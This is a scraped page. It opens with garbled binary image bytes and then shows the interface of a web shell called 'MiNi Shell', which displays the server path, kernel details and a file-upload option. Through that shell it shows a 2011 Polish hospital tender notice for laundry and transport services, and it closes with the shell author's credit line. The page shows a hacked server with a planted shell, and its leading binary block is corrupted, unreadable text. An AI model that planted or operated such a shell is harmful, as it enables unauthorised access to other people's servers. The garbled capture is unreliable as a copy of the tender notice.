JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111220/432400-N-2011.html

<p class="kh_header"><b>Włoszczowa: ŚWIADCZENIE USŁUG PRALNICZYCH 
WRAZ Z TRANSPORTEM</b><br>
<b>Numer ogłoszenia: 432400 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. Żeromskiego 28, 29-100 Włoszczowa, woj. świętokrzyskie, tel. 041 3883828, faks 041 3883877.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biuletyn.abip.pl/zozwloszczowa</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PRALNICZYCH 
WRAZ Z TRANSPORTEM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje świadczenie usług pralniczych wraz z transportem:
-usługi prowadzenia pralni
 - usługi odbierania prania
Wymagania stawiane Wykonawcy: 
1)	w zakres świadczonych usług pralniczych wchodzi: pranie wodne bielizny szpitalnej, 
     operacyjnej, materacy, pokrowców na materace, koców, poduszek, oraz odzieży  
     ochronnej i operacyjnej i innych ( firany, zasłony, obrusy); dezynfekcja chemiczno - 
     termiczna; maglowanie i prasowanie oraz czyszczenie chemiczne asortymentu nie 
     nadającego się do prania wodnego wraz z transportem.
2)  odbieranie bielizny brudnej i dostarczanie bielizny czystej odbywać się będzie od 
    poniedziałku do piątku. W przypadku zaistnienia konieczności świadczenie w/w usługi 
    w soboty i inne dni wolne od pracy szczegółowy jej zakres będzie uzgadniany z 7 
     dniowym wyprzedzeniem.
3)	usługi mają być świadczone do 24 godzin od chwili przekazania asortymentu 
     pralniczego za wyjątkiem odzieży fasonowej, która musi wracać do Zamawiającego 
    do 48 godzin od chwili przekazania oraz materacy, kocy i poduszek, które muszą 
    wracać do Zamawiającego do 72 godzin od chwili przekazania.
4)	bielizna czysta będzie dostarczana w godzinach od 13:00 do 13: 30 środkiem transportu  przystosowanym do transportu bielizny czystej.
      Magazyn bielizny czystej znajduje się w ZOZ Włoszczowa ul. Żeromskiego 28.
5)	bielizna brudna odbierana będzie w  godzinach  od 14:00 do 14:30 środkiem transportu  przystosowanym do transportu bielizny brudnej.               
     Magazyn bielizny brudnej znajduje się w ZOZ Włoszczowa ul. Żeromskiego 28.
      6)  pracownik dostarczający bieliznę obowiązany jest posiadać prawidłowy 
           ubiór - fartuch ochronny i rękawice ochronne. 
7)	bielizna czysta przywożona z pralni musi być poskładana i zapakowana   
asortymentowo w  folie jednorazowego użytku lub opakowanie foliowe jednorazowego użytku,  a odzież ochronna na  wieszakach również w workach foliowych.
      8)  transport bielizny czystej do Zamawiającego i brudnej do pralni ma odbywać się
            w wózkach jezdnych, dostarczonych na czas trwania umowy przez Wykonawcę.  
             Wykonawca ma obowiązek  kontroli procesu dezynfekcji wózków do transportu.
       9)  Wykonawca odpowiada za bieliznę Zamawiającego od momentu jej odebrania z 
            magazynu  bielizny brudnej, do czasu przekazania  czystej bielizny do magazynu 
            Zamawiającego. 
     10 ) Wykonawca usługi zobowiązany jest do potwierdzenia odbioru na kwicie zbiorczym 
            wykazującym asortymentowe ilości oddanej bielizny oraz określające jej wagę ogólną,
            w/w kwit potwierdza własnoręcznym podpisem pracownik szpitala oraz odbiorca.        
      11) Zamawiającemu przysługuje prawo do reklamacji nieprawidłowego wykonania 
              usługi.
12)	Wykonawca ma obowiązek raz na kwartał na swój koszt dostarczyć Zamawiającemu 
            kopie  badań mikrobiologicznych potwierdzonych przez PPIS lub inny  podmiot  
           posiadający  publicznoprawne uprawnienia weryfikacyjne nabyte w trybie akredytacji 
           uregulowanym  przepisami ustawy z dnia 30  sierpnia 2002 roku o systemie oceny 
           zgodności  ( Dz. U  Nr  166 poz. 1360 z zm.)  przeprowadzonych w  pralni 
           Wykonawcy potwierdzających skuteczność prania i  dezynfekcji. Zamawiający 
           ponadto  zastrzega sobie prawo wykonania własnych  wymazów czystościowych 
           w chwili  dostarczenia bielizny do magazynu  Zamawiającego w obecności pracownika 
          Wykonawcy.   
    13 ) płukanie odzieży fasonowej będzie odbywało się przy użyciu płynu antystatycznego.
 14) w przypadku zniszczenia bielizny ( utraty walorów estetycznych lub użytkowych oraz 
          braków ilościowych ), Wykonawca będzie zobowiązany do zakupienia na własny koszt 
          i przekazania takiej ilości i rodzaju bielizny jaka uległa uszkodzeniu w terminie 3 dni 
          od momentu zgłoszenia reklamacji w formie pisemnej. Asortyment uszkodzony 
          Wykonawca zobowiązany jest zapakować osobno,     
   15) Wykonawca ponosić będzie odpowiedzialność prawną i materialną za wykonywane 
         usługi pralnicze w zakresie jakości i zgodności z wymogami sanitarnymi wobec 
          organów kontroli ( Stacja Sanitarno - Epidemiologiczna, PIP, BHP, Epidemiologii 
          Szpitalnej ),
   16 ) przed zawarciem umowy Zamawiający ma prawo weryfikacji informacji  i podanych 
           w ofercie poprzez wizytę w pralni Wykonawcy,
  17)  zaoferowana cena prania bielizny winna uwzględniać koszty użyczenia Zamawiającemu 
          bielizny płaskiej o właściwościach antygrzybicznych i składzie 35% poliester i 65% 
          bawełna,
  18) Wykonawca przy wykonywaniu usługi winien zatrudniać nie mniej niż 50% osób 
         niepełnosprawnych, o których mowa w przepisach o rehabilitacji zawodowej
          i społecznej oraz zatrudnianiu osób niepełnosprawnych,
19) pralnia w której będzie świadczona usługa nie może znajdować się dalej niż w promieniu 
       100 km od siedziby Zamawiającego
Szacunkowo przyjmuje się ilość pranej bielizny szpitalnej w okresie trwania umowy
 na   poziomie około 60 000 kg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.12.00-8, 98.31.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udowodnić zrealizowanie 1 usługi  i realizowanie 1 usługi jako 
 główny wykonawca w okresie  ostatnich 3 lat a jeżeli okres prowadzenia działalności 
 jest krótszy w tym okresie  usługi odpowiadającej swoim rodzajem i  wartością 
 przedmiotowi zamówienia ,  z załączeniem  do oferty dokumentów potwierdzających  
 należyte wykonanie i wykonywanie tych  usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia spełnienia tego warunku wykonawca winien załączyć: 
 a) Opinię sanitarną  wydaną przez właściwego Państwowego Powiatowego Inspektora 
    Sanitarnego w oparciu o przeprowadzone kontrole,  spełniającą wymogi
    Rozporządzenia Ministra Zdrowia z dnia 22 czerwca 2005 roku ( Dz. U 116 poz. 985 )
    stwierdzającą istnienie bariery higienicznej w pralni w której świadczona będzie 
     usługa.
    
b) Opinię sanitarną wydaną przez właściwego Państwowego Powiatowego Inspektora 
     Sanitarnego dotyczącą środków transportu.  
 
c) Protokół z  ostatniej kontroli Państwowego Powiatowego Inspektora Sanitarnego.
d) Wykaz środków transportu, sprzętu pralniczego i urządzeń niezbędnych do
    wykonania zamówienia, jakimi dysponuje wykonawca wraz   z podaniem podstawy
    prawnej do dysponowania  środkami transportu, sprzętu pralniczego i urządzeń. W
    przypadku tytułu innego niż własność Wykonawcy,  należy podać okres ( w datach )   na jaki została zawarta umowa  uprawniająca Wykonawcę do dysponowania,
   środkami transportu, sprzętu pralniczego i urządzeń niezbędnych do wykonania 
   zamówienia. e) Wykaz środków piorących i dezynfekujących jakich Wykonawca zamierza używać do 
  wykonania zamówienia.

f)  Technologię prania i dezynfekcji bielizny w tym: moduły prania i dezynfekcji 
      bielizny, operacyjnej i zakaźnej, dziecięcej i noworodkowej oraz ogólno szpitalnej, 
     opracowanej i zaakceptowanej przez producenta środków piorących, zgodną z
      atestami wystawionymi przez  podmiot  posiadający publicznoprawne uprawnienia
      weryfikacyjne nabyte w trybie akredytacji uregulowanym  przepisami ustawy z dnia
     30  sierpnia 2002 roku o systemie oceny zgodności  ( Dz. U  Nr  166 poz. 1360 z zm.)

g) Zaświadczenie  wystawione  przez  podmiot  posiadający  publicznoprawne
     uprawnienia weryfikacyjne nabyte w trybie akredytacji uregulowanym  przepisami 
     ustawy z dnia 30 sierpnia 2002 roku o systemie oceny zgodności  ( Dz. U  Nr 166 poz. 
     1360 z zm.)  że środki  piorące i dezynfekujące  odpowiadają określonym normom, 
     certyfikaty CE na środki dezynfekujące, pozytywną opinię Instytutu Matki  i Dziecka 
     lub Centrum Zdrowia Dziecka dla środków  do prania bielizny noworodkowej,  
     niemowlęcej i dziecięcej. Karty charakterystyk  wszystkich środków piorących, jakie
     będą  używane w procesie prania. 

h) Celem  potwierdzenia jakości świadczonych usług pod kątem czystości 
    mikrobiologicznej Wykonawca winien załączyć  do oferty sprawozdanie z badania
    bakteriologicznego zawierającego co najmniej 4 wymazy czystościowe pobrane z 
    różnego rodzaju bielizny po procesie prania w okresie 12 miesięcy przed składaniem 
    ofert  potwierdzone  przez Państwowego  Powiatowego  Inspektora Sanitarnego lub
    inny  podmiot  posiadający publicznoprawne uprawnienia  weryfikacyjne nabyte w 
    trybie akredytacji uregulowanym przepisami  ustawy  z dnia 30 sierpnia 2002 roku o 
     systemie  oceny  zgodności  ( Dz. U Nr 166 poz. 1360 z zm.).
 )  Celem potwierdzenia skuteczności procesu dezynfekcji wózków i pojemników 
      Wykonawca winien załączyć do oferty wyniki badań mikrobiologicznych
      potwierdzonych przez Państwowego Powiatowego Inspektora Sanitarnego  lub inny
      podmiot  posiadający publicznoprawne uprawnienia weryfikacyjne nabyte w trybie
      akredytacji uregulowanym przepisami ustawy z dnia 30  sierpnia 2002 roku o
      systemie oceny zgodności  ( Dz. U  Nr 166 poz. 1360 z zm.) -  minimum  1 badanie.

j) dokument potwierdzający posiadanie przez Wykonawcę statusu Zakładu Pracy Chronionej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien załączyć kopię polisy  lub innego  dokumentu  ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej z tytułu odpowiedzialności deliktowej Wykonawcy o wartości co najmniej 600 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy.
2.	Parafowany projekt umowy.
3.	Pełnomocnictwo dla osoby podpisującej ofertę jeżeli jej prawo do reprezentacji nie wynika z innych dokumentów załączonych do oferty. 

Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust 1 pkt. 5 - 8 ustawy Prawo zamówień   publicznych, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt. 5 - 8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.  

Jeżeli, wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w punkcie 7.1, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

a)	Aktualny odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1  pkt 2 ustawy.
b)	Oświadczenie o spełnianiu warunków udziału w postępowaniu.
c)	Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust 1 
      ustawy Prawo zamówień publicznych. 


Ocena spełniania warunków udziału w postępowaniu odbywa się według formuły spełnia/nie spełnia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip.pl/zozwloszczowa<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Obsługi Adm. Technicznej ZOZ Włoszczowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2011 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej we Włoszczowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com